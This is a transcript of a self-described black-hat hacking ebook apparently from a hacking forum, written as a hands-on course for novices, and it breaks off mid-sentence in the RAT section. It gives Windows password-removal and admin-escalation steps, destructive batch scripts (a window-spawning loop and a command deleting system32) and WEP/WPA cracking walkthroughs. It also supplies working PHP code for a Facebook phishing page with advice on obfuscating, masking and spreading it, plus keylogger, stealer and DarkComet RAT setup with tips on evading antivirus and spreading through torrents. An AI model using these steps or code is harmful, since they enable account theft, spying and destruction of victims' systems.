Into the Hacker's Mind
-
Upload
marko-kenistara -
Category
Documents
-
view
433 -
download
17
description
Transcript of Into the Hacker's Mind
Index :- Introduction-Chapter 1: Making it clear -I-The world "HACKER" -II-Different types of Hackers -a-Black hats -b-White hats -c-Grey hats-Chapter 2: The first steps -I-Beginners fun -a-Windows User passwords -b-Getting admin -c-Changing IP and VPNs -d-Batch virus -II-Wifi hacking -a-WEP -b-WPA/WPa2 -III-Online accounts hacking -a-Phishing -b-Keyloggers -c-RATs-Chapter 3: Because "Chapter 2" is too easy ! -I-Websites Attacks: -a-SQL injection -b-XSS/cross site scripting -c-DOS/DDOS -d-Defacing -II-Next level: Botnet -III-Worms ?? -IV-Booters-Chapter 4:Some coding and programming -I-Intro -II-Stealers -a-Builder -b-stub -III-Loggers -a-Builder -b-Stub -IV-Crypters -a-Builder -b-Stub -c-Runtime module-Chapter 5:Pentesting and backtrack -I-Introduction to penetration testing -II-Network scanning and information gathering -III-Social engineering toolkit and DNS spoofing -IV-Metasploit: -a-Intro -b-payloads/stager -c-meterpreter-Chapter 6:Extra : To keep your ass out of troubles-Chapter 7:From a hacker to another.
Hello and welcome to hacking world, this ebook was written by CyberGod to help any
new or intermediate hacker. This isn't an
informative book nor a hacking dictionary, but
instead you can consider it like a teacher that
will help you through your journey, this mean
that everything you learn from this book can be
applied and used directly and not just
information about various subjects.
Now that you know what you will be reading, I
would like to mention that I am not responsible
for any action you make based on what you
learned from this book. And I would like to
thank the whole HF awesome community, if
you downloaded this book from somewhere
else and you are not a member of HF is suggest
you go and register for an account right now.
http://www.hackforums.net
Chapitre 1: Making it
clear.
I. The world 'Hacker'You want to be a hacker ? ok... but first things first, so
what does the world 'hacker' refer to?
Usually a hacker is a person with a great knowledge in
informatic and/or electronics, and by great I mean more
then an average person. Now when most people hear the
world hacker it is associated with evil and bad actions like
hacking bank accounts or websites .... But you must know
that not all hackers use their knowledge for bad things. A
hacker activities : accounts hacking, pentesting,
programming, RATs/Botnet, making money.... And a bunch
more . Before ending this small section I would like to say
that anyone who wants to be an advanced or expert
hacker must learn how to program and code in several
language, for a total newbie I suggest starting with
something like HTML or VB.net these are easy to learn .
II. Different type of hackers‐a‐Black hats
Black hat hackers are the bad guys, and you must know
this is a black hat book. black hat hackers usually try to
hack into all type of accounts from online banks and
paypal to facebook and msn, using different methods like
RATs, keyloggers and fake pages. A more advanced black
hat hacker will want to write his own crypters and RATs
and try to build a huge botnet to take down servers and
websites.
Black hat hackers are always trying to breack any security
system or bypassing AV and firewalls, some of them also
like to use social engineering to trick peoples into their
traps.
The causes ? Well I can only think of two main causes :
making money or prouving themself and aquiring forbiden
knowledge.
‐b‐White hats
White hats are the opposite of black hats, these guys use
their knowledge to help others, they usually code AV and
offer help to infected systems; they try to build what black
hats destroy.
There is not alot to be told about them, just know that
they are the oppnents of black hats in an endless war.
‐c‐Grey hats
As you can guess a grey hat hacker is a mix of a black and a
white hat hacker. Usually they want no harm to others but
can turn into a black hat to accomplish their goals.
Chaptre 2: The first
Steps
I.Beginners fun‐a‐Windows User Passwords
In this chaptre you will learn how to remove any user
password using windows operating system. I know this
may sound noob or too easy for some but for a beginner
this will be an excellent first lesson.
Before going directly into action I would like to explain
how we are going to remove that password. By the way I
will be showing you 2 methods. First off all you must know
that windows user password are stored on the HD so using
a simple bootable program we can have full access to that
HD and remove the password then boot again into
windows, don't worry if you didn't understand a word
because I will explain every thing. The second method can
be used only with a windows XP operating system, what
you actually do is login to the hidden unprotected user
"administrator" and remove the password of the other
users from there.
.1. Enough talking lets get to action, I will explain the second
method first. Assuming your on the login screen and your
asked for the password, all you have to do is press
ctrl+alt+del then keeping the ctrl and alt pressed, release
the del button then press it again. You should be
presented with a login form where you can enter a user
and a password, in the user write "administrator" without
and leave the password field blank now you should be able
to login to the administrator user. Once there you can
remove any other user's password without knowing the
old one, finally you should know that the user
administrator can be protected by a password so this
method wont work anymore, but in default it comes with
no password and most people don't know about that user
so in 99% of the time it will be unprotected.
.2.
Now for the other method. You will need a blank CD or
DVD, a cd/dvd and a burning software; I am going to be
using Nero but you can use any other burning software.
Now if you are in Nero choose "burn image" and select the
"password‐reset.iso" provided in the "Files" folder. Insert a
blank CD and click burn, you should end up with a
bootable CD. I want to mention that we can also use a usb
instead of a CD, just follow the instruction brovided by the
"README.txt" inside the iso image.
The next step would be to boot from the CD/DVD/USB, for
that you have to insert you CD/DVD/USB then restart your
computer, and follow one of the instructions below:
When the computer is starting you will get a message
similar to that "press F1 to enter BIOS setup" F1 isn't the
standar key for all BIOS it vary from one to another. To
enter the setup simply press the correct key. Now in the
BIOS go to the tab "Startup" or "Boot" and change the
boot order, if your booting from a CD or DVD put the
CD/DVD drive at position 1, if you want to boot from a USB
stick then choose the correspondant device and put it at
position 1.
In the above picture I chose the DVD device to be #1. Next you need to save and exit. After the setup exit your computer should reboot and it will boot from the CD, press enter and wait for the program to load.
The first thing you will be asked is to choose the correct partition, this mean if your HDD is devided into several partion (ex: C:\ and D:\) you need to choose the system partition (the one containing the "windows" folder and files), in my case it is number "2", so I will just type "2" and hit enter.
Next we want to point the program to the config folder, don't panic it is usually "Windows/system32/config" you get this option by default so just press enter without typing anything.
Now choose "Password reset" which is number "1".
Then "Edit user data and passwords"
Now you need to choose the user with the password to be removed, for that you need to type the hole name of the user and it is case sensitive (You will be provided with the users list).
Then you will be provided with several useful options, we are going to use option "1" or if you want to change the password and not remove it then choose "2" and hit enter.
You will get the above message "Password cleared !" now type "!" then press enter. You will be asked : "About to write file(s) back ! Do it ?" by default it is [n] which means "no", this will undo the changes so we want to type "y" for yes and press enter, press enter for the next message and you are done. Remove the CD and press ctrl + alt + del to reboot.
After the reboot you will notice that the password was removed. Don't forget to choose your HDD as the boot device from the BIOS after you are done. This is the end of our first lesson.
‐Getting admin‐
That is actually pretty simple on a Windows machine, you
will learn 2 different ways to do it. And if you are asking
why I am always targeting Windows machines, then the
answer would be because Windows is the most used
operation system and the easiest to hack. Now to action.
Methode 1: You are going to use CMD or also know as
command prompt. For me this methode is useless because
you need to be administrator in the first place, all it does is
add another administrator user, but it can come in hand
some day if the account your in is monitored or have some
restriction, I don't know... Here is what you need to do
open cmd by goind to "Run" then type CMD.exe or open a
notepad and type in :
"cmd"
Without quotes and then save it as anything.BAT it is
important to add .bat at the end of the name so it is
treated as a batch file.
Once iin CMD type :
net localgroup Administrators <username> /add
replace <username> with the name you want and press
enter. Now log out and you should see the new
administrator user.
Method 2: For this method you need to do the exact same
thing we did with the "Password reset" (see it here) until
you are at this stage
Now you need to choose option 3 "Promote user" and continue the same way we did for removing the password.
The End
‐c‐Changing IP address and VPNs
Why whould I want to change my IP ? and what is a VPN?
well I will answer your question right now. If you are going
to hack a website or RAT someone you obviously don't
want to be tracked so changing your IP is going to help you
a lot. Changing your IP can also help bypassing some
restrictions like a banned IP.
Now for the VPN part; VPN stand for Virtual Private
Network, using a VPN service will create a private
encrypted connection between you and the provider this
mean that no one can intercept your connection and if
someone traced you back it will lead him to the VPN
provider and not to your personal computer.
I will talk no longer about VPN, because it is easy to get
one, there is some free VPN out there but the best ones
charges for money.
Now how to change your IP; you are going to need a proxy
changer program and a proxy list. A proxy is simply an
IP+port you use that port to connect to the IP and use it. I
will be using a program called "Proxy switcher", it is a paid
program but I provided you with a cracked copy, you can
find in in "Files" under the name "Proxy‐Switcher.rar".
Now follow the instructions :
1‐ Installing Proxy Switcher :
First extract the rar archive and install Proxy switcher,
after the installation is done right click on Proxy switcher
icon in task bar and click "register proxy switcher" use any
name with the key I provided in key.txt. Now exit proxy
switcher then lunch it again and you are ok to go.
2‐ finding fresh proxy : Well this part is more like a google
search you need to search for "proxy list" or "fresh proxy
list" or you can use the Proxy switcher itself to seach for
proxys for you here is how you do that.
.a. Using Proxy Switcher :
Richt click on the task bar ‐‐> Show Manager
Now click the "Common task wizard"
Click "Next" then choose the first option in the common tasks and click finish.
Then wait for the program to get the proxy then scan then and you will have a list of dead and working proxys now double click on any working one and you are good to go.
Note : Some time your internet connection may get slower based on the speed of the proxy server. And you wont always find proxy using Proxy server so I prefer searching in google.
.b. Using Google (Better) :
Simple go to google an search for frech proxy list, get any list that you think is fresh then copy it to a notepad and save it. Now go to Proxy switcher ‐‐> File ‐‐> Import from text file... and choose the txt file you save the list in.
Now click on new and you should have a list on unchecked proxys.
Click on Test proxy servers for availibility. And wait for the scan.
Now You should get working and dead proxys. Choose one of the working proxy and connect to it then go see if you ip has changed. Here is a trick, if you get no working proxy you can choose a dead one with a relatively small ping/Response and connect to it and it should work. Here is a picture to make things clear.
Before I conclude, here is a list of free VPN services :
ProXPN
CyberGost
Hotspot Shield
GPass
SecurityKiss
and a bunch more...
‐d‐Batch Virus
"Batch file is the name given to a type of script file, a text
file containing a series of commands to be executed by the
command interpreter.
The commands may be built into the command processor
(COPY), supplied with the operating system but not built
into it (XCOPY invokes the Microsoft DOS program
XCOPY.EXE), or may be any program (cp invokes the
program cp.exe if present, an .EXE port of the Unix cp
command, with essentially the same functionality as
XCOPY.EXE).
Similar to job control language and other systems on
mainframe and minicomputer systems, batch files were
added to ease the work required for certain regular tasks
by allowing the user to set up a script to automate them.
When a batch file is run, the shell program (usually
COMMAND.COM or cmd.exe) reads the file and executes
its commands, normally line‐by‐line.[1] Unix‐like operating
systems (such as Linux) have a similar type of file called a
shell script.[2]
The filename extension .bat was used in DOS, and the
Windows 9x family of operating systems. The Microsoft
Windows NT‐family of operating systems and OS/2 added
.cmd. Batch files for other environments may have
different extensions, e.g. .btm in 4DOS and 4NT related
shells." Thanks Wikipedia.
Now that you know what a batch file is, I will give a list of
some commands and a decription then jump to the part
where we use these command to make simple evil virus.
(Don't be afraid of the list you don't have to memorise it
:P, we will be using only a few of these commands.)
Commands list :
@ In DOS version 3.3 and later, hides the echo of a
batch command. Any output generated by the command is
echoed. The at‐sign can be prefixed to any DOS command,
program name, or batch file name within a batch file.
@[command]
examples @ {Seperates sections of the batch file
without diplaying the DOS prompt.}
@echo OFF {Hides the echo off report.}
%DIGIT Replaceable batch parameters which are defined
by the user when the batch is executed. The parameters
are separated by spaces, commas, or semicolons.
%digit {Digit: any digit from 0 to 9. %0 has the
value of the batch command as it appears on the
command line when the batch is executed. %1 represents
the first string typed after the batch commmand. Each
occurrence of %digit is replaced by the corresponding
string from the batch command line.}
examples MYBATCH DOC A:
COPY *.%1 %2 {Copies all .DOC files in the default
directory to drive A:}
%VARIABLE% Replaces the DOS environment variable
name with its environment value.
%variable% {Variable: a string of uppercase
characers in the environment associated with a string
value. Variable is created in the environment by using
SET.}
examples %PATH% {Returns the value of PATH, the
current search path, which is executable.}
echo %PATH% {Displays the value of PATH, the
current search path.}
%PROMPT% {Returns the value of PROMPT, the
current prompt string, which is executable.}
echo %PROMPT% {Displays the value of PROMPT,
the current prompt string.}
echo The current search path is: %PATH% {Displays
the message including the current search path.}
set USER=John
if %USER%= =John goto LABEL {Since the value of USER
does equal "John", the control is transferred to the label,
LABEL.}
CALL Loads and executes a batch file from within a
batch file as if it were a external command. When a
second batch file completes, control is returned to the
calling file.
call [drive:][path]filename [batch‐parameters]
Before DOS version 3.3:
command /c [drive:][path]filename [batch‐parameters]
CLS Clears the video display screen, setting the cursor in
the upper left‐hand corner.
cls
ECHO Controls whether commands and comments
within a batch file are displayed.
echo [ON|OFF|message|.]
examples echo {Displays echo status}
echo ON {Restores normal display activity.}
echo OFF {Halts display of DOS prompt and
commands.}
echo Processing... {Displays "Processing..." on the
screen.}
echo %USER% {Displays the value of USER on the
screen.}
echo. {Displays a single blank line on the screen.}
echo ^L > prn {Sends an ASCII control‐code (form
feed) to the printer. Press <Ctrl> plus <L> to type the ^L
character.}
echo Y|Del *.* {Answers the DEL "Are you sure"
question automatically.}
FOR Repeats the operation of a DOS command for each
member of a list. Use CALL to execute a batch file as a
command.
for %%argument in (list) do command {Argument:
any letter from A to Z. List: a sequence of strings separated
by spaces or commas. Wildcards are allowed.}
examples for %%d in (A,C,D) do DIR %%d *.*
{Displays the directories of drives A, C, and D
sequentially.}
for %%f in (*.TXT *.BAT *.DOC) do TYPE %%f
{Types the contents of all .TXT, .BAT, and .DOC files in
the current default directory.}
for %%P in (%PATH%) do if exist %%P\*.BAT COPY %%
P\*.BAT C:\BAT {Copies all batch files which exist in
any directory on the DOS command search path into the
directory C:\BAT.}
for %%f in (*.PAS) do call compile %%f {Compiles all
.PAS files in the current default directory.}
GOTO Transfers control within a batch file to a line
identified by a label. The label must be of the form
":LABEL".
goto LABEL
:LABEL
IF Tests a condition and executes a command only if the
condition is TRUE. But if the NOT modifier is present, the
command will be executed only if the condition is FALSE.
if [not] condition command {Condition: errorlevel
number; string1= =string2; or exist filename. Command:
any DOS command, batch command, batch file name, or
program name.}
examples if [not] errorlevel number command
{Errorlevel: an exit code returned by a program or an
external command. The following DOS commands return
an exit code: BACKUP, RESTORE, FORMAT, REPLACE, and
XCOPY. Number: a numerical value (integer) against which
the exit code is compared. The condition is TRUE if the exit
code returned by the previous program is greater than or
equal to number. The condition is FALSE if the exit code is
less than number.}
BACKUP C:\*.* A: /s
if errorlevel 3 goto TROUBLE {If the BACKUP command
exits with a code of 3 or higher, control will be transferred
to the label TROUBLE.}
if errorlevel 3 if not errorlevel 4 echo ERROR #3
occurred
if errorlevel 4 if not errorlevel 5 echo ERROR #4 occurred
{Nested if statements that determine the exact error
number.}
if [not] string1= =string2 command {The condition
is TRUE if both strings are identical. The comparison is case
sensitive. If either string is blank, a syntax error occurs.}
if (%1)= =(LTRS) CD C:\WORD\LTRS {If the first
parameter is LTRS, the change directory to LTRS.}
if "%1"= ="" goto ERROR {If there is no
parameter, then control is transferred to label ERROR.}
if not %2X= =X DIR %2\*.* {If there is a second
parameter, then display all the files contained in the
directory %2.}
if not "%3"= ="" if not "%3"= ="b" if not "%3"= ="B"
goto BADPARAM {If there is no third parameter or if it is
anything other than b or B, then go to label BADPARAM.}
if [not] exist filename command {The condition is
TRUE if filename can be located. The filename can include
drive and path specifications. Wildcards are allowed.}
if exist D:\%1\nul CD %1 {Tests for the existence
of directory %1 even if it contains no files, then changes to
that directory if it exists.}
if not exist A:\FLASH.EXE COPY C:\PROJECTS
\FLASH.EXE A: {Copies FLASH.EXE to drive A, but only if it
doesn't exit there already.}
PAUSE Pauses the running of a batch file and displays
the message "Press any key to continue ..." on the screen.
If the optional message is included, it will be displayed
first. Use pause to optionally terminate the batch file with
<Ctrl‐Break> at a safe place. The optional message is not
displayed when echo is OFF, so the message must be
echoed on the preceding line.
pause [message]
examples pause {Displays "Press any key to
continue ...".}
pause < nul {Waits with no comment.}
pause Do you want to continue? {Displays "Do you
want to continue?" with "Press any key to continue ..." on
the next line.}
REM Adds remarks to a batch file.
rem [remark]
examples @rem {Hides the remark from display.}
SET Set will view the DOS environment or create, change,
or delete environment values.
set [variable=[value]] {Variable: a string of
characters, unbroken by spaces, which are converted to
uppercase letters in the environment. Value: a string of
characters, case specific, associated with variable.}
examples set {Display the entire DOS environment.}
set USER=John {Sets the value of USER to the
string, "John".}
set USER= {Removes USER from the
environment.}
set PATH=C:\;C:\DOS {Sets C:\;C:\DOS as the
current search path.}
set PATH=%PATH%;C:\TEST {Appends ;C:\TEST to
the current search path.}
SHIFT Shifts any parameter on the command line one
position to the left. Use SHIFT to refer to multiple
parameters by one name or to use more than ten
parameters on a single command line.
shift
examples :LOOP
COPY %1 A:
shift
if not (%1)==() goto LOOP {Beginning with the first
parameter, all the parameters listed on the command line
are iterated and a file, the value of the parameter, is
copied to A:.}
Miscellaneous
command > nul {Redirects command output to
oblivion.}
command > file {Redirects command output to
file.}
command >> file {Appends command output to
file.}
command < file {Redirects file output to
command.}
PATH {Displays "PATH=" followed by the value of
PATH, the current search path.}
PATH directories {Sets directories as the current
search path.}
PATH = directories {Sets directories as the current
search path.}
PATH; {Disables extended command searching and
confines the searching to the default directory.}
PROMPT {Resets the prompt string to its default, $n
$g.}
CD {Displays the current directory and its path.}
. {Represents the default directory (If PATH=D:\;C:
\SYS;C:. then current directory will be searched after D:
and C:\SYS).}
.. {Represents the parent of the default directory
(C:\TOOLS\WP\LTRS.DOC is the same as ..\WP
\LTRS.DOC).}
%% {A literal "%".}
End of list
Now to the cool part, I will show you several batch files
that can be used to harm someones pc or just to prank
someone. For all the following exemples you need to type
the code in a notepad and save it as "something.BAT"
adding ".BAT" at the end is a must do so it save the file as
batch.
1‐ open endless windows :
@echo off
start file.bat
goto file.bat
#How the code works : "file.bat" is the name of your batch
file you can chnge it if you want.
"start file.bat" : open the file.bat
"goto file.bat" : go to the previous line and open another
windows. So this is an endless loop of opening windows
and the best part is that every new windows will start
opening new windows also. This can crash an old weak
computer.
2‐ Delete file or folder
@echo off
del/q "c:\windows\system32"
These two lines may appear pretty simple but can have a
devastating effect on a Windows operating system. We
are simply using the "del" command to delete a specific
folder contants, in this case "system32" folder. The tricky
part is the "/q" after "del", adding this will selete the files
without asking the user for comfirmation .
3‐ Shutdown computer
Usage: shutdown [‐i | ‐l | ‐s | ‐r | ‐a] [‐f] [‐m
\\computername] [‐t xx] [‐c "comment"] [‐d up:xx:yy]
No args Display this message (same as ‐?)
‐i Display GUI interface, must be the first option
‐l Log off (cannot be used with ‐m option)
‐s Shutdown the computer
‐r Shutdown and restart the computer
‐a Abort a system shutdown
‐m \\computername Remote computer to
shutdown/restart/abort
‐t xx Set timeout for shutdown to xx seconds
‐c "comment" Shutdown comment (maximum of 127
characters)
‐f Forces running applications to close without warning
‐d [u] [p]:xx:yyThe reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than
65536)
Very clear no need to explain anything.
Conclusion : Using the cmd command you can pretty much
do any task in windows, the above exemples just show you
how to play with built in commands to achive your own
goals...
II.Wifi HackingIn this section I will show you how to crack two diffrent
type of wifi encryptions, WEP and WPA/WPA2. In both
sections we will be using backtrack 5 R2 so if you don' t
have it go download it now it is free from the official site, I
use KDE‐32bit but any other version of BT 5 will do it. For
who don't know what is Backtrack : "BackTrack is a Linux‐
based penetration testing arsenal that aids security
professionals in the ability to perform assessments in a
purely native environment dedicated to hacking."
Here is the official website : http://www.backtrack‐
linux.org/
Download backtrack then burn it to a DVD and boot. Once
your in type "Startx" to change from text login to graphical
login.
Back screen fix :
1)insert the DVD‐live
2)in the grub (When asked to choose a boot option)press
TAB to edit boot
3)you well see somthing like this
file=/cdrom/preseed/ubuntu.seed boot=casper
initrd=/casper/initrd.gz
add xforcevesa noapic noapci nosplash irqpoll ‐‐ after
initrd.gz
This should fix the problem.
‐Wep‐
Wep is relatively easy to crack, specialy with BT 5 and
"Gerix wifi hacker". One more thing, if you want to
experiment all aricrack features you will need to have a
compatible wireless card, I suggest Alfa Network wireless
adapters.
First we need to open Geris wifi cracker. "Backtrack‐>
Exploitation Tools‐>Wireless Exploitation Tools‐>WLAN
Exploitation‐>gerix‐wifi‐cracker‐ng"
Next Go to the "Configuration" tab select your wireless
card interface usually "wlan0" or "wlan1" and click
"Enable/Disable Monitor Mode".
A new interface should appear under the name "mon0"
having "Monitor" as Mode. If that doesn't happen or if the
Mode isn't "Monitor" then probably your wireless card
isn't compatible. Anyway lets move on, now select the
new monitored interface and click "Rescan networks". You
will get a list off all wireless networks near you, Essid is the
name of the network and Bssid is the mac address, you will
need alse to check the "Enc" (encryption) tab, for this part
the network should have a "WEP" encryption. Select a
compatible network and move to the "WEP" tab.
First we need to collect some packets; go to the "General
functionalities" section and click "Strat Sniffing and
Logging".
A new terminal will appear, showing the packets capture
and all the client connected to the attacked access point
(Router). The number under "#Data" determine how many
packets we have captured. and the mac address under
"Station" refer to the clients connected to the AP, in my
case there is only one device connected with the mac
address "7C:11:BE:91:FF:E6" (I can tell it is an iphone from
the mac address).
The more device using the AP the faster we will collect
packets, our goal number is above 10 000 packets. Now
for the attacks, in my case I am using an intel wireless card
so the attacks wont have a big effect but I will show you
how to do them. I will go with "WEP Attacks (no‐client)"
because this will work even if there is no device connected
to the wireless network.
We have two type of attacks in the no‐client section :
ChopChop and fragmentation, here is a list of pros and
cons:
Fragmentation
Pros
‐ Can obtain the full packet length of 1500 bits xor. This
means you can subsequently pretty well create any size of
packet.
‐ May work where chopchop does not.
‐ Is extremely fast. It yields the xor stream extremely
quickly when successful.
Cons
‐ Need more information to launch it ‐ IE IP address info.
Quite often this can be guessed. Better still, aireplay‐ng
assumes source and destination IPs of 255.255.255.255 if
nothing is specified. This will work successfully on most
APs. So this is a limited con.
‐ Setup to execute the attack is more subject to the device
drivers. For example, Atheros does notc generate the
correct packets unless the wireless card is set to the mac
address you are spoofing.
Chopchop
Pros
‐ May work where frag does not work.
‐ You don't need to know any IP information.
Cons
‐ Cannot be used against every access point.
‐ The maximum xor bits is limited to the length of the
packet you chopchop against.
‐ Much slower then the fragmentation attack.
I will start with the chopchop attack first click "Start false
access point Authentication on victim".
Then "Start ChopChop attack" type "y" for yes in the new
windows and press enter. Wait some seconds then press
"Create the ARP packet to be injected on the victim access
point".
Finally "Inject the created packet on victim access point".
Follow the same steps for the fragmentation attack they
are very similar.
Now we wait until we get more then 10 000 ‐ 15 000
packets.
Then go to the "Cracking"‐> "WEP cracking" and click
"Aircrack‐ng ‐ Decrypt WEP passowrd", wait for it to finish
and you will get your password . Remove the ":" from, so
in my case it will be "2400242890" .
‐WPA/WPA2‐
This attack need at least one client who is connected to
the AP.
Same as WEP until you choose a network to crack, for this
you need the network to have WPA or WPA2 encryption.
select it then go to "WPA" tab.
Now "Start Sniffing and Logging".
Now we need to get a "Handshake" so we can brute force the password, to do that open "WPA attacks" then click
"autoload victim clients"
Now click "client deauthentication" wait for it to finish and you will get "WPA handshake: AP BSSID" (if not try increasing the deauth number, it is 4 by default).
‐> Waiting for client deauthentication.
After we get a handshake we are ready to start cracking, so first we need to get a dictionary file; it is basicly a very big list of password you can find one easly if you google it. I will assume you got you dictionary file, now go to "Cracking"‐> "WPA bruteforce cracking". In normal cracking type the location of your dictionary file (including
the file's name) and click "Aircrack‐ng ‐ Crack WPA password".
Almost done, if your dictionary contains the password aircrack should be able to decrypt it.
This conclude the second section of chapter 2.
II.Online accounts.
(Facebook, hotmail, gmail...)If you have no idea or any previous experience about
accounts hacking then READ this:
1‐ A program or a software that automatically hack
accounts by giving it username or email does NOTexist, so please don't be fooled by the fake youtube
videos.
2‐ Social Engineering : also known as SE is the art of
manipulating/tricking peoples; usually used to get some
information from the victim or trick them into fake login/
keyloggers....
3‐ Hacking accounts IS a cyber crime and can get you in jail
in some countrys.
4‐ " Ohh no my facebook/hotmail.... account was hacked,
how can I hack it back ? " Stop whining about and use the
password recovery button, it is lot easier then hacking the
person who hacked you in the first place.
5‐ These tutorials are for education purpose so don't
abuse this knowledge for personal revenge.
Enough said lets move into action.
‐a‐ Phishing
A phishing page is a fake login page that looks exactly like
the original one but once you login it will send the
username and password to the hacker. It is probably the
easiest and most efficient way to hack an account, but
require more SE then the other.
1‐ What you will need :
‐ Free/paid webhosting.
....Yes, that is all you will need in addition to a brain and a
computer of course.
2‐ Making the fake page :
‐a‐ Choose a website, I will go with Facebook, if you don't
have any knowledge of html and php coding stick to my
exemple so you follow me easily.
‐b‐ Go to the website login page, in my case it is
facebook.com or facebook.com/login.php both pages have
a login form. Then we need to get the web page source
code, if you are using firefox jusr right click and select
"View Page Source" or you can press Ctrl + U. Copy all
code then past it in notepad++ or notepad.
‐c‐ Now we need to create a php file that will receive the
message (email/pass) sent by the page and write it to a
text file. So go on and open a new notepad windows and
copy past this code.
<?php
header ('Location: http://');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
You can edit:
‐The redirection location in the second line after
"Location:"
‐Text file name holding the emails and passwords in line 3
original name "logs.txt"
After you have set these option to your liking save it as
something.php ( I will name it action.php)
‐d‐Uploading : First you need to creat an account with
webhosting service here is some free ones :
7ry.us
000webhost.com
freewebhostingarea.com
zymic.com
After you have created and account create a free domain
then login to your domain.
Now in you domain cpanel search for your ftp login info, and save then somewhere then log out.
Google Filezilla and download it then use the ftp login you got from your host to login.
Now you can easily upload file from you computer (left) to the online host (right); go on and upload the php file we created earlier.
The file action.php is now online so lets get his link, to do that right click the file and select "Copy URL(s) to clipboard".
This will give you the ftp link but we need to get the http link, follow this.
ftp : ftp://user@domain/fileteh/action.php
to get the http linnk remove everything before the @ including the @. Also if in the link there is reference to "public_html" remove it.
So my http link will be : http://domain/fileteh/action.php
‐e‐ Back to the page code; we need to search the code for
the part about the login form more specificly for the code
that sends the request to the server. For Facebook search
the code for :
action="https://www.facebook.com/login.php?
login_attempt=1"
Make sure this code is in the form "login_form".
Now replace the link after action=" with your php file link ("http://domain/fileteh/action.php")
‐f‐ Obfuscate then upload. To obfuscate your code go to
http://htmlobfuscator.com/ then copy all the modified html (webpage) code to from notepad to the website and click obfuscate then copy the obfuscated code and place it in notepad then save it as something.html
And upload your html file the same way you did for the php file then get the http url.
‐g‐ Setting permissions, in filezilla right click the two file and click "File peromissons..." then change it 777 and click
"ok".
‐h‐ Testing: finally you are ready to test the page. Go to the html page you uploaded (not the php page) and it should look just like facebook.
Write any username and password then press login the page will then redirect you (You can change redirection page in the php file see step "c" ). Then refresh Filezilla ang a new txt file should be there with the username and password inside.
Extra :
‐Masking the link : If you link looks too suspicious then you can mask it. That is very easy go to www.dot.tk and select a new URL name.
Then in the "Forward this domain to" insert the link to the sake page.
Now you can send the .tk link and they will be redirected to the fake page.
‐ Spreading : Here comes the SE part.You need to trick to login with your fake page, you can tell them they will get free facebook gold or free likes or just tell them it is a new version of facebook with lots of new stuffs; you wont believe how stupid some people are so just come up with a story and make them login using the fake page.
THE END
‐b‐Keyloggers
‐1‐ What is a keylogger ?
A keylogger run in silent mod (hidden) on the slave's pc
and will record all pressed keys in addition to
screenshots/webcame and then send the logs to the
hacker. Keyloggers are used to steal passwords or spy on
comversations and user's activities.
‐2‐ How to setup a Stealer + Logger ?
I will be using "Unknown Logger Public V 1.5" located in
the Files folder under the name : "Unknown Logger Public
V 1.5.rar"
(Credits goes for unknowns from hackforums.net for that great free logger.)
This logger has 2 delivery option : By email or by FTP, I
recommend using ftp as it is more stable or use a fake
email so if you are traced to the email they wont get your
real one.
1) Using FTP :
First login to your ftp account (You can see details on how
to create one in the previous part "Phishing")using Filezilla
then create a text file and upload it, lets name it "logs.txt"
Now in the Logger fill in the information with user name, password of the ftp, and for the URL go to Filezilla and copy the URL of the "logs.txt"
For the email delivery :
I recommend Gmail. Enter your email, password , choose "smtp.gmail.com", then enter the email address to send the logs for. (Don't touch the port)
Testing the delivery :
For both email and FTP click the " Send: Tags Explanation/Test " button, if everything is ok you will see this message. (may take like 1 minute max if you have slow internet connection)
If you chek your logs file or your email you should get this.
The next step is configuring the Logger and Stealer. First for the Logger, there is the "Send Logs" option if you leave it 1 this means the loggers will send the logs every 1 min , i recommend every 2 or 3 min but it is up to you. The name is simply the name of the virus. Now click the " Settings " button and check "Run on StartUp" in the "Extras".
Now for the Stealer, simply check everything in the "Stealers" tab in "Settings". (You can check only 1 or 2 options if you don't want the others)
That how it should look.
Now give it a name then click " Build " (will be build in the same location as the builder).
‐3‐ Spreading
If you want to spread your keylogger successfully you will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. To do this you will need a FUD crypter I did not include one with the book because a private FUD crypter will cost you money.
Your next step is to find some place to spread it one, usually torrents are the best find a new fresh prgram/game/crack/movie... download it, use a binder to bind the file with your keylogger and start spreading.
You can also use extension spoofer if you are spreading the keylogger without binding it with another application, this will make it look less suspecious.
‐c‐ Remote Administrator Tools
‐1‐ What is a RAT ?
RAT stand for Remote Administrator Tool or Remote
access Trojan, it a malware program that would give the
hacker access to the victim's computer. RAT usually spread
in torrents and pirated/fake softwares. A system infected
by a RAT is part of an infected network called botnet. A
botnet can have several goals, most common :
‐money
‐DDOS (Attacks websites)
‐2‐ How to setup Dark Comet RAT?
Dark comet is one of the best free (public) RATs, but as a
public RAT it is easly detected by AV so consider using a
crypter.
General idea on how the RAT will work: There is two part
in a RAT, a client and a server; The server is sent to the
victim to infect the computer, then the server will try to
establish a connection with the client. The client receive
the connection and communicate back with the hacker's
commands. It is very similar to multiplayer games a person
create a game (Client) and the other players connect to it
(server).
The server will need and IP address and a port to connect
to the client, as some of us don't have a unique IP (IP can
change everytime you connect to the internet) we will use
a DNS host. This mean the server will connect to the DNS
host then will be redirected to your IP, and you can update
your DNS host every time your IP change.
What is left to do is port forwarding your router, this
means open port to allow the server to connect.
a) No‐ip DNS host
To get a free DNS host, we need to sign up at www.no‐ip.com, once you sign up go on and login to your account.
Then click on "Add a Host".
Enter a host name and leave the host type to DNS Host (A) then click "Create Host".
Now we need to download no‐ip client so we can update the IP fast and easy. To do so click on "Download Client" in the left panel.
b) Creating the server.
You must know that Dark comet is a RAT and will be detected by your AV so turn it off or add dark comet to the exeptions list.
Go to the "Files" folder provided with this ebook and extract "DarkCometRAT531.zip" open the folder then run "DarkComet.exe" accept the terms and you good to go.
To create the server go to : DarkComet‐RAT‐> Server module(657.50 Kb)‐> Minimalist (quick) or if you want to fully costumize the server choose Full editor (expert)
Set the setting as shows in the above picture, you have to change "IP/DNS" to the no‐ip DNS host your created earlier; you can also change the port and the icon if you want. Now click normal to build the serve.
c) Lets open some ports.
Before we can start listening for connections we need to open the port we used for ther server in my case "1604". This can be very if your router support UpNP, anyway follow these steps :
‐ Go to Socket/Net tab in DarkComet, then righ click and add port.
Enter your port number and make sure "Try to forward automaticaly (UpNP)" is checked, then click "Listen".
Now we need to check if the port is open, to do so go to :
